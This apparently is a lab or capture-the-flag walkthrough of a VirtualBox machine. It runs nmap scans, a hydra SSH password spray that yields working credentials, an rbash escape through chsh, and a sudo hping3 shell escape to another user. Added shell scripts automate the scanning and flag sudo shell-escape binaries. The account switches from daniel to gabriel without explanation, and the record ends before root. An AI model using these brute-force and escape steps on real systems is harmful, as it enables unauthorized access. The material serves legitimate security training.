sudo nmap --min-rate 10000 -p- 192.168.56.115
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-16 09:32 UTC
Nmap scan report for 192.168.56.115 (192.168.56.115)
Host is up (0.00031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:C6:C3:71 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.59 seconds
sudo nmap -sT -sV -sC -O -p22,80 192.168.56.115
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-16 09:32 UTC
Nmap scan report for 192.168.56.115 (192.168.56.115)
Host is up (0.00029s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 8a:e9:c1:c2:a3:44:40:26:6f:22:37:c3:fe:a1:19:f2 (RSA)
|   256 4f:4a:d6:47:1a:87:7e:69:86:7f:5e:11:5c:4f:f1:48 (ECDSA)
|_  256 46:f4:2c:28:53:ef:4c:2b:70:f8:99:7e:39:64:ec:07 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:C6:C3:71 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
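The two scans above are the usual two-stage pattern: a fast sweep of all 65535 ports, then version, script and OS detection restricted to whatever came back open. The script below is an added example (not part of the original writeup) that wires the two stages together and pulls the open port list out of the first scan's output; it assumes nmap is installed and that the caller can run it via sudo. The embedded sample is the stage-1 output shown above, so the parser can be exercised without a live target.

```shell
#!/bin/sh
# Two-stage TCP scan as used in the writeup: a fast full-range sweep first,
# then version/script/OS detection limited to the ports that came back open.
# Added example, not the writeup's own script. Assumes nmap is installed and
# that the caller may run it via sudo (needed for -O and raw-socket scans).

# open_ports: read nmap normal-format output on stdin and print the open TCP
# ports as a comma-separated list suitable for nmap -p (e.g. "22,80").
# Only "open" is kept; "open|filtered" entries are deliberately skipped so the
# second stage is not wasted on ports that never answered.
open_ports() {
    awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
             sub(/\/tcp$/, "", $1)
             printf "%s%s", sep, $1
             sep = ","
         }
         END { print "" }'
}

# scan_host TARGET: run both stages. Stage 1 uses --min-rate 10000, which is
# fine on a one-hop VirtualBox host-only network (as here) but can silently
# drop ports on lossy links; lower it or re-run if the port list looks thin.
scan_host() {
    target=$1
    ports=$(sudo nmap --min-rate 10000 -p- "$target" | open_ports)
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $target" >&2
        return 1
    fi
    sudo nmap -sT -sV -sC -O -p"$ports" "$target"
}

# Constructed sample input: the stage-1 output from the writeup, embedded so
# the parser can be exercised without a live target.
SAMPLE_STAGE1='Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-16 09:32 UTC
Nmap scan report for 192.168.56.115 (192.168.56.115)
Host is up (0.00031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:C6:C3:71 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.59 seconds'

# Live use: scan_host 192.168.56.115
# The line below only parses the sample and prints "22,80".
printf '%s\n' "$SAMPLE_STAGE1" | open_ports
```

Against a real host, `scan_host 192.168.56.115` reproduces the two commands from the writeup; the parser is the only part that runs offline.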
hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p lionsarebigcats ssh://192.168.56.115
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-16 09:41:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking ssh://192.168.56.115:22/
[22][ssh] host: 192.168.56.115   login: daniel   password: lionsarebigcats
This gives the credentials daniel:lionsarebigcats.
Log in directly over SSH.
Privilege escalation
On login it turns out this user's shell is rbash, i.e. restricted bash: cd, changing PATH, output redirection and running any command whose name contains a / are all blocked.
chsh -s /bin/bash daniel
The user is allowed to change their own login shell. chsh rewrites the shell field in /etc/passwd, so after switching it to /bin/bash and logging in again the session starts in a normal, unrestricted bash.
Nothing else sensitive turned up, so I uploaded pspy. It showed one recurring root process, and the same binary also appeared when searching for SUID files:
/sbin/agetty -o -p -- \u --noclear tty1 linux
-rwsrws--- 1 root peter 64744 Jan 10  2019 /usr/sbin/agetty
The getty on tty1 runs as root, and the binary is SUID root and SGID with group peter; the mode bits mean only root and members of the peter group can execute it at all, so getting to peter is the next target.
sudo -l
Matching Defaults entries for gabriel on soul:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gabriel may run the following commands on soul:
    (peter) NOPASSWD: /usr/sbin/hping3
gabriel@soul:~$ sudo -u peter /usr/sbin/hping3
hping3> /bin/bash
hping3's interactive prompt is a Tcl shell, and any line it does not recognise as one of its own commands is executed as an external program, so typing /bin/bash at the prompt drops into a shell running as peter.
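The sudo -l output above is the kind of thing worth triaging mechanically on every foothold: which run-as users are reachable without a password, and which of the allowed binaries can be talked into spawning a shell, as hping3 is here. The script below is an added example, not part of the writeup; it parses sudo -l output into (run-as user, tag, command) rules and flags the ones whose binary is on a short hand-picked shell-escape list (illustrative, not an exhaustive GTFOBins lookup). The sample input is the writeup's own sudo -l output for gabriel plus one made-up rule to exercise comma-separated command lists.

```shell
#!/bin/sh
# Parse "sudo -l" output into (run-as user, tag, command) rules and flag the
# ones whose binary can hand out an interactive shell, as hping3 does here.
# Added example, not from the writeup. The escape list is a short hand-picked
# set for illustration, not an exhaustive GTFOBins lookup.

# Binaries that let you spawn a shell from inside the program. hping3's
# interactive prompt is a Tcl shell; any line it does not recognise is run as
# an external command, which is why "hping3> /bin/bash" worked above.
SHELL_ESCAPE_BINS="hping3 vim vi less more man find awk perl python python3"

# sudo_rules: read "sudo -l" output on stdin, print one rule per line as
#   RUNAS TAG COMMAND
# where TAG is NOPASSWD or PASSWD. Handles "(user : group)" specs and
# comma-separated command lists such as "(root) /bin/ls, /usr/bin/vim".
sudo_rules() {
    awk '/^[[:space:]]*\(/ && match($0, /\([^)]*\)/) {
             runas = substr($0, RSTART + 1, RLENGTH - 2)
             sub(/[[:space:]]*:.*$/, "", runas)          # "(root : root)" -> "root"
             rest = substr($0, RSTART + RLENGTH)
             tag = (rest ~ /NOPASSWD:/) ? "NOPASSWD" : "PASSWD"
             sub(/^.*PASSWD:[[:space:]]*/, "", rest)     # drop NOPASSWD:/PASSWD: and earlier tags
             sub(/^[[:space:]]+/, "", rest)
             n = split(rest, cmds, /,[[:space:]]*/)
             for (i = 1; i <= n; i++) print runas, tag, cmds[i]
         }'
}

# flag_escapes: read sudo_rules output on stdin and print the rules whose
# command (basename, arguments ignored) is in SHELL_ESCAPE_BINS.
flag_escapes() {
    while read -r runas tag cmd; do
        bin=${cmd##*/}        # basename of the command path
        bin=${bin%% *}        # strip any arguments
        case " $SHELL_ESCAPE_BINS " in
            *" $bin "*) printf 'shell escape: run as %s (%s) via %s\n' "$runas" "$tag" "$cmd" ;;
        esac
    done
}

# Constructed sample: the writeup's sudo -l output for gabriel, plus one
# made-up rule to exercise the comma-separated case.
SAMPLE_SUDO_L='Matching Defaults entries for gabriel on soul:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gabriel may run the following commands on soul:
    (peter) NOPASSWD: /usr/sbin/hping3
    (root) /usr/bin/ls, /usr/bin/vim'

# Live use: sudo -l | sudo_rules | flag_escapes
printf '%s\n' "$SAMPLE_SUDO_L" | sudo_rules | flag_escapes
```

On the sample this prints the hping3 rule (run as peter, NOPASSWD) and the made-up vim rule; ls is not flagged. On a live host, `sudo -l | sudo_rules | flag_escapes` does the same triage for the current user.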